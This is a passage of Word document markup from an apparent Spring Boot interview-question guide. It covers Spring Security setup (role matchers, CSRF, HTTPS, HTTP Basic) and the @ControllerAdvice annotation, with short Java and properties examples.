    <w:p w14:paraId="61BD44E2"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EnableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35086DD1"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F69B675" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35895D94"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D7BDA5"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otected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C935CB2"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C581F50"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uthorizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB60347"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ntMatchers("/admin/**").hasRole("ADMIN")    // Access restricted to users with ADMIN role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A86BA6"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ntMatchers("/user/**").hasRole("USER")      // Access restricted to users with USER role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48368344"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nyRequest().authenticated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5697E0"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nd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D53DB"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formLogin().permitAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956A631"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2C327108"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26270178" w14:textId="77777777" w:rsidR="00A174AB"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1D3BE86">
          <v:rect id="_x0000_i2581" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41702FF6" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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7. CSRF Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ECC244"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By default, Spring Security enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CSRF protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. For REST APIs (especially stateless applications), you may disable CSRF protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E572A3" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B9914"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nfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC6124"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788789DA" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C05FFE"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F470D"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otected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C584E9"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55889830"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csrf().disable()  // Disable CSRF for stateless APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74435675"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uthorizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5658AB5B"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ntMatchers("/public/**").permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B2AEC8"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nyRequest().authenticated();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE7F7A3"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4D13FEE8"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1326EA31" w14:textId="77777777" w:rsidR="00A174AB"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340F7AA">
          <v:rect id="_x0000_i2582" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F32075" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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8. HTTPS Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48310D5B"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o enforce HTTPS (secure communication), you can configure Spring Boot to use SSL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDA48A2" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2129E4"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n application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C51151F"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erver.port=8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA44BDC"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erver.ssl.key-store=classpath:keystore.jks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FF0BAB"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erver.ssl.key-store-password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F634D"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erver.ssl.keyStoreType=JKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35418C6A"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erver.ssl.keyAlias=tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB499B2"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Ensure you have a valid SSL certificate and keystore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61791DAD" w14:textId="77777777" w:rsidR="00A174AB"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E6A1E8F">
          <v:rect id="_x0000_i2583" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7451C8" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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9. Basic Authorization Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7260FD"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You can also configure Spring Security to require HTTP Basic Authentication or use a custom header for token-based security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FFA326" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7722CF74"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D8FA7"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rotected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FCAC8C"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C743727"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httpBasic()  // Enable HTTP Basic Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617480CC"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nd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E03B3"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uthorizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7660D1F3"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ntMatchers("/secure/**").authenticated();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B635501"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2CC0FFC6" w14:textId="77777777" w:rsidR="00A174AB"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82319B5">
          <v:rect id="_x0000_i2584" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="032124E0" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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Summary of Security Features in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299065F7"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Authentication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Basic, Form-based, JWT, OAuth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A47E3D"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Authorization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Role-based access control using @PreAuthorize or @Secured annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788BBBE7"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Secure Endpoints:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use HttpSecurity to secure endpoints based on roles or permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B493A4"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Custom Filters:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add custom authentication filters like JWT token filter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6190C4D5"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CSRF Protection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disabled or enabled based on your application’s nature (stateless vs stateful).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBF972"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HTTPS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure SSL to enforce secure communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FD4AA0" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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se are the common ways to provide security in a Spring Boot application. Spring Security is highly customizable and can be tailored to meet various application security needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CFC6A8" w14:textId="4282CEFD"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D362DAC">
          <v:rect id="_x0000_i2585" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A28A0" w14:textId="740EF55A" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00B95F49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="599" w:name="_Toc196308079"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is @ControllerAdvice in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="599"/>
    </w:p>
    <w:p w14:paraId="731251D2" w14:textId="42C96B8C" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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ControllerAdvice is a specialized annotation in Spring used to handle exceptions across the whole application in one global handling mechanism. It is used to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global exception handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bind certain model attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or even apply </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global data</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to all controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9DE86" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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Key Points about @ControllerAdvice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A909F"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Global Exception Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECB0AB7" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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t allows you to handle exceptions globally for all controllers in the application, eliminating the need for repetitive exception handling logic in each individual controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E66D7FC" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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You can define @ExceptionHandler methods within @ControllerAdvice to catch specific exceptions or all exceptions and return appropriate responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A78BFA7"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Binding Model Attributes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055D5319" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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ControllerAdvice can be used to add common attributes to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will be available to all controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68498912"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Global Data for Controllers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C7112" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">You can also apply </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global model attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for every request that passes through controllers in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262AB135"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Targeted for Controller Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD06C9" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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This annotation is meant for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller-related functionality</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like exception handling or adding global data for views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105A2045" w14:textId="77777777" w:rsidR="00DB7207"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18C5D7E">
          <v:rect id="_x0000_i2586" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C94A2F9" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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 of @ControllerAdvice Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D153B" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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1. Global Exception Handling Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B644C21"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http.HttpStatus;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C963B4"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ui.Model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602E8CE"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web.bind.annotation.ControllerAdvice;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A9D657"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web.bind.annotation.ExceptionHandler;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690A796"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web.bind.annotation.ModelAttribute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A197B"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web.bind.annotation.ResponseStatus;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530646B" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C892374"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ntrollerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4421F707"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GlobalExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E91DF" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FEF90B"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ExceptionHandler(Exception.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA4FD73"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sponseStatus(HttpStatus.INTERNAL_SERVER_ERROR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C188B"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String handleException(Exception ex, Model model) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06665867"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model.addAttribute("error", ex.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A1AF9"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error";  // Return an error view</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC974BB"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71902590"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41FDFA47"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n this example, any exception that is thrown from the controller methods will be caught by @ExceptionHandler in @ControllerAdvice, and it will show an error page with the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47773E19" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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2. Adding Global Model Attributes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449629C9"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web.bind.annotation.ControllerAdvice;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCDE2A7"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web.bind.annotation.ModelAttribute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287D0A52" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6001A39C"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ontrollerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EE7DE0"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GlobalModelAttributes {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FCAED" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF8A3B1"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ModelAttribute("appName")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AC7C9E"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String addAppName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B357F88"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Spring Boot Application";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A5ED9"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41C56786"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4D215E77"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Here, the attribute appName will be available in every controller method and view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1431CC75" w14:textId="77777777" w:rsidR="00DB7207"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0EB6F1B">
          <v:rect id="_x0000_i2587" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="557D5415" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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Benefits of @ControllerAdvice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F9095"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Centralized Exception Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It allows handling exceptions in a single place, improving maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A6DA3"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Cleaner Code:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reduces the need for duplicate code to handle common logic like setting model attributes or exception handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABCC0F6"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Global Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provides a way to add common data to all models used in controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643606F" w14:textId="77777777" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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n summary, @ControllerAdvice is a very useful feature in Spring for handling global exception handling, adding model attributes, or providing global configuration across all controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519364B" w14:textId="294B2BD7"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694E612">
          <v:rect id="_x0000_i2588" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5BAEA" w14:textId="38C059E0" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="007C7D29">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="600" w:name="_Toc196308080"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to retrieve query parameters in Spring boot</w:t>
